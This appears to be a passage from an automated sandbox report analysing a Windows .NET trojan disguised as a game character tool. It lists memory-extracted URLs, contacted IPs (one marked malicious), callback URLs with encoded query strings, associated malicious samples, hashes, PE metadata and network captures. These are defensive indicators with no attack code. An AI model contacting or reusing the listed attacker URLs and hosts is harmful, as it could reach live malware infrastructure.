                                          http://www.zhongyicts.com.cnTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://fontfabrik.comjTPJX2QwEdXs5sTV.exe, 00000001.00000003.246270583.000000000603B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sakkal.comTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.goodfont.co.kr-cYTPJX2QwEdXs5sTV.exe, 00000001.00000003.250685229.000000000603B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000008.00000000.308790689.0000000006870000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.carterandcone.comaTPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252658676.000000000603B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.apache.org/licenses/LICENSE-2.0TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.carterandcone.comexcTPJX2QwEdXs5sTV.exe, 00000001.00000003.252876215.000000000603B000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.comTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.tiro.comwTPJX2QwEdXs5sTV.exe, 00000001.00000003.252833728.000000000603B000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.carterandcone.comdTPJX2QwEdXs5sTV.exe, 00000001.00000003.252349501.000000000603B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.fontbureau.com/designers/cabarga.htmloTPJX2QwEdXs5sTV.exe, 00000001.00000003.258643842.000000000605E000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.sajatypeworks.comtTPJX2QwEdXs5sTV.exe, 00000001.00000003.245363117.0000000006022000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cno.UTPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.urwpp.deATPJX2QwEdXs5sTV.exe, 00000001.00000003.256226500.0000000006041000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cno.ETPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://en.wTPJX2QwEdXs5sTV.exe, 00000001.00000003.247036337.000000000603B000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sakkal.com9TPJX2QwEdXs5sTV.exe, 00000001.00000003.253864499.0000000006043000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.carterandcone.comlTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252434713.000000000603B000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cnkTPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.founder.com.cn/cn/TPJX2QwEdXs5sTV.exe, 00000001.00000003.251510361.0000000006040000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.carterandcone.comofTPJX2QwEdXs5sTV.exe, 00000001.00000003.252225171.000000000603B000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers/cabarga.htmlNTPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.founder.com.cn/cnTPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn0TPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers/frere-jones.htmlTPJX2QwEdXs5sTV.exe, 00000001.00000003.258314127.000000000605E000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.258167734.0000000006041000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.sakkal.com3TPJX2QwEdXs5sTV.exe, 00000001.00000003.253704425.0000000006043000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlTPJX2QwEdXs5sTV.exe, 00000001.00000003.258643842.000000000605E000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.founder.com.cn/cncomTPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.monotype.TPJX2QwEdXs5sTV.exe, 00000001.00000003.260424917.000000000603B000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.jiyu-kobo.co.jp/TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLVcmd.exe, 00000017.00000002.521651760.0000000003C32000.00000004.00020000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.carterandcone.comonaTPJX2QwEdXs5sTV.exe, 00000001.00000003.252225171.000000000603B000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.ascendercorp.com/typedesigners.htmlhTPJX2QwEdXs5sTV.exe, 00000001.00000003.253864499.0000000006043000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers8TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cnicrTPJX2QwEdXs5sTV.exe, 00000001.00000003.251577185.000000000603B000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.goodfont.co.kXTPJX2QwEdXs5sTV.exe, 00000001.00000003.250819017.000000000603B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.sandoll.co.kra-e#TPJX2QwEdXs5sTV.exe, 00000001.00000003.250514753.000000000603B000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers/TPJX2QwEdXs5sTV.exe, 00000001.00000003.256412762.0000000006041000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cn(TPJX2QwEdXs5sTV.exe, 00000001.00000003.251297242.000000000603B000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers3TPJX2QwEdXs5sTV.exe, 00000001.00000003.258749887.000000000603B000.00000004.00000001.sdmpfalse
                                                              high

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              54.194.41.141
                                                              domains.readymag.comUnited States
                                                              16509AMAZON-02USfalse
                                                              172.67.147.111
                                                              www.munortiete.comUnited States
                                                              13335CLOUDFLARENETUStrue

                                                              Private

                                                              IP
                                                              192.168.2.1

                                                              General Information

                                                              Joe Sandbox Version:33.0.0 White Diamond
                                                              Analysis ID:483640
                                                              Start date:15.09.2021
                                                              Start time:10:37:40
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 11m 44s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:TPJX2QwEdXs5sTV.exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:28
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@10/1@7/3
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 9.2% (good quality ratio 8.8%)
                                                              • Quality average: 77%
                                                              • Quality standard deviation: 26%
                                                              HCA Information:
                                                              • Successful, ratio: 99%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                              • Excluded IPs from analysis (whitelisted): 23.35.236.56, 20.82.210.154, 209.197.3.8, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208
                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, cds.d2s7q6s2.hwcdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              10:38:48API Interceptor1x Sleep call for process: TPJX2QwEdXs5sTV.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              54.194.41.141PO889876.pdf.exeGet hashmaliciousBrowse
                                                              • www.maleev.design/a7dr/?NTots4J=R9ptnxQNB44VdMlgavxu7aNuHoyYBwaJO8KVHTec7XFz9L8vbWf1S3lhRtFZGNrBr39p&Ch9De=9rj01Zg0
                                                              DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                              • www.maleev.design/a7dr/?vT=R9ptnxQNB44VdMlgavxu7aNuHoyYBwaJO8KVHTec7XFz9L8vbWf1S3lhRtFZGNrBr39p&S0Gl9T=RPHlpDKhNf_x
                                                              Nigj57ar4W.exeGet hashmaliciousBrowse
                                                              • www.zuluforest.com/g050/?QZ3d8rFH=51f9LteLSLtZ/KEFFUFc6GczSQZWKxJptRVR4rE3mzWWLUSWQ1nFrlc8EIzEiz7hG4yH&3fnDH=hpvPaByp64GpMl8p

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              domains.readymag.comPO889876.pdf.exeGet hashmaliciousBrowse
                                                              • 54.194.41.141
                                                              DHL Receipt_AWB811470484778.exeGet hashmaliciousBrowse
                                                              • 54.194.41.141

                                                              ASN

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              AMAZON-02UStgamf4XuLa.exeGet hashmaliciousBrowse
                                                              • 99.83.154.118
                                                              SRMETALINDUSTRIES.exeGet hashmaliciousBrowse
                                                              • 44.227.65.245
                                                              PI L032452021xxls.exeGet hashmaliciousBrowse
                                                              • 99.83.154.118
                                                              Unpaid invoice.exeGet hashmaliciousBrowse
                                                              • 99.83.154.118
                                                              FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
                                                              • 3.139.50.24
                                                              FaxGUO65DE.391343-Faa.htmlGet hashmaliciousBrowse
                                                              • 3.139.50.24
                                                              Elon Musk Club - 024705 .htmGet hashmaliciousBrowse
                                                              • 13.226.156.103
                                                              PGQBjDmDZ4Get hashmaliciousBrowse
                                                              • 34.249.145.219
                                                              m5DozqUO2tGet hashmaliciousBrowse
                                                              • 54.70.167.99
                                                              avxeC9WssiGet hashmaliciousBrowse
                                                              • 13.52.148.225
                                                              Wh3hrPWbBGGet hashmaliciousBrowse
                                                              • 34.249.145.219
                                                              re2.x86Get hashmaliciousBrowse
                                                              • 184.77.232.100
                                                              re2.arm7Get hashmaliciousBrowse
                                                              • 63.32.132.1
                                                              Fourlokov9.x86Get hashmaliciousBrowse
                                                              • 34.249.145.219
                                                              re2.x86Get hashmaliciousBrowse
                                                              • 54.96.126.50
                                                              re2.armGet hashmaliciousBrowse
                                                              • 18.226.174.198
                                                              XbvAoRKnFm.exeGet hashmaliciousBrowse
                                                              • 52.218.0.168
                                                              Enclosed.xlsxGet hashmaliciousBrowse
                                                              • 13.238.159.178
                                                              HBW PAYMENT LIST FOR 2021,20210809.xlsxGet hashmaliciousBrowse
                                                              • 3.139.183.122
                                                              debit.xlsxGet hashmaliciousBrowse
                                                              • 52.77.232.215

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TPJX2QwEdXs5sTV.exe.log
                                                              Process:C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.355304211458859
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                              MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                              SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                              SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                              SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.724399427496627
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:TPJX2QwEdXs5sTV.exe
                                                              File size:671232
                                                              MD5:ce556ce97ea23cbc2940f2aad45d468f
                                                              SHA1:cc2bdaefa2f0ac108e2f456e42a42e8258580cf4
                                                              SHA256:7c3d5ebd2c417a52b2a0b98dee95b5a7f283816f6a2453ceeffd31becc140882
                                                              SHA512:82d4d71aeb5118d600394c64eb127ca4a87d7b83702feb4f9c5b0a0d98a597f812ebfd16784cbde54b9f4b1c87d3c7eaf57fb1c86b9720df95419887fc13f77b
                                                              SSDEEP:12288:cC2I/yzQs2TaIpIByklwoL18/kdfskxRXP6erdH2fQiZ8uXpIe:cOMIpIBG/CUqRXP64gf5Ie
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .Aa.....................n......".... ........@.. ....................................@................................

                                                              File Icon

                                                              Icon Hash:f1f0f4d0eecccc71

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x49ed22
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                              Time Stamp:0x61419020 [Wed Sep 15 06:18:08 2021 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:v4.0.30319
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                              Entrypoint Preview

                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9ecc80x57.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xa20000x6b3c.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xa00000xc.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x20000x9cd280x9ce00False0.870889877988data7.79647412085IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                              .reloc0xa00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              .rsrc0xa20000x6b3c0x6c00False0.441261574074data5.13425944435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountry
                                                              RT_ICON0xa22b00x668data
                                                              RT_ICON0xa29180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725
                                                              RT_ICON0xa2c000x128GLS_BINARY_LSB_FIRST
                                                              RT_ICON0xa2d280xea8data
                                                              RT_ICON0xa3bd00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                                              RT_ICON0xa44780x568GLS_BINARY_LSB_FIRST
                                                              RT_ICON0xa49e00x25a8data
                                                              RT_ICON0xa6f880x10a8data
                                                              RT_ICON0xa80300x468GLS_BINARY_LSB_FIRST
                                                              RT_GROUP_ICON0xa84980x84data
                                                              RT_VERSION0xa851c0x46cdata
                                                              RT_MANIFEST0xa89880x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                              Imports

                                                              DLLImport
                                                              mscoree.dll_CorExeMain

                                                              Version Infos

                                                              DescriptionData
                                                              Translation0x0000 0x04b0
                                                              LegalCopyrightCopyright 2008 - 2010
                                                              Assembly Version1.3.0.0
                                                              InternalNameBINDOP.exe
                                                              FileVersion1.3.0.0
                                                              CompanyNameWHC
                                                              LegalTrademarks
                                                              CommentsA little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                                              ProductNameRYL Character Tool - RoW EU version
                                                              ProductVersion1.3.0.0
                                                              FileDescriptionRYL Character Tool - RoW EU version
                                                              OriginalFilenameBINDOP.exe

                                                              Network Behavior

                                                              Snort IDS Alerts

                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                              09/15/21-10:40:22.963692TCP1201ATTACK-RESPONSES 403 Forbidden804980954.194.41.141192.168.2.7
                                                              09/15/21-10:40:30.779091ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.78.8.8.8

                                                              Network Port Distribution

                                                              TCP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 15, 2021 10:40:22.870871067 CEST4980980192.168.2.754.194.41.141
                                                              Sep 15, 2021 10:40:22.916246891 CEST804980954.194.41.141192.168.2.7
                                                              Sep 15, 2021 10:40:22.916414022 CEST4980980192.168.2.754.194.41.141
                                                              Sep 15, 2021 10:40:22.916647911 CEST4980980192.168.2.754.194.41.141
                                                              Sep 15, 2021 10:40:22.961667061 CEST804980954.194.41.141192.168.2.7
                                                              Sep 15, 2021 10:40:22.963691950 CEST804980954.194.41.141192.168.2.7
                                                              Sep 15, 2021 10:40:22.963721991 CEST804980954.194.41.141192.168.2.7
                                                              Sep 15, 2021 10:40:22.968941927 CEST4980980192.168.2.754.194.41.141
                                                              Sep 15, 2021 10:40:22.968986034 CEST4980980192.168.2.754.194.41.141
                                                              Sep 15, 2021 10:40:23.020061970 CEST804980954.194.41.141192.168.2.7
                                                              Sep 15, 2021 10:40:34.881098986 CEST4981080192.168.2.7172.67.147.111
                                                              Sep 15, 2021 10:40:34.897906065 CEST8049810172.67.147.111192.168.2.7
                                                              Sep 15, 2021 10:40:34.908710957 CEST4981080192.168.2.7172.67.147.111
                                                              Sep 15, 2021 10:40:34.909507036 CEST4981080192.168.2.7172.67.147.111
                                                              Sep 15, 2021 10:40:34.926214933 CEST8049810172.67.147.111192.168.2.7
                                                              Sep 15, 2021 10:40:34.941842079 CEST8049810172.67.147.111192.168.2.7
                                                              Sep 15, 2021 10:40:34.941930056 CEST8049810172.67.147.111192.168.2.7
                                                              Sep 15, 2021 10:40:34.942150116 CEST4981080192.168.2.7172.67.147.111
                                                              Sep 15, 2021 10:40:34.942254066 CEST4981080192.168.2.7172.67.147.111
                                                              Sep 15, 2021 10:40:34.958969116 CEST8049810172.67.147.111192.168.2.7

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 15, 2021 10:38:46.986335993 CEST5856253192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:38:47.016876936 CEST53585628.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:00.102910042 CEST5659053192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:00.136336088 CEST53565908.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:20.280997992 CEST6050153192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:20.314630032 CEST53605018.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:20.413455963 CEST5377553192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:20.439740896 CEST53537758.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:27.876425982 CEST5183753192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:27.909624100 CEST53518378.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:28.535415888 CEST5541153192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:28.563684940 CEST53554118.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:29.114669085 CEST6366853192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:29.144901991 CEST53636688.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:29.617160082 CEST5464053192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:29.619275093 CEST5873953192.168.2.78.8.8.8
                                                              Sep 15, 2021 10:39:29.647044897 CEST53546408.8.8.8192.168.2.7
                                                              Sep 15, 2021 10:39:29.663314104 CEST53587398.8.8.8192.168.2.7
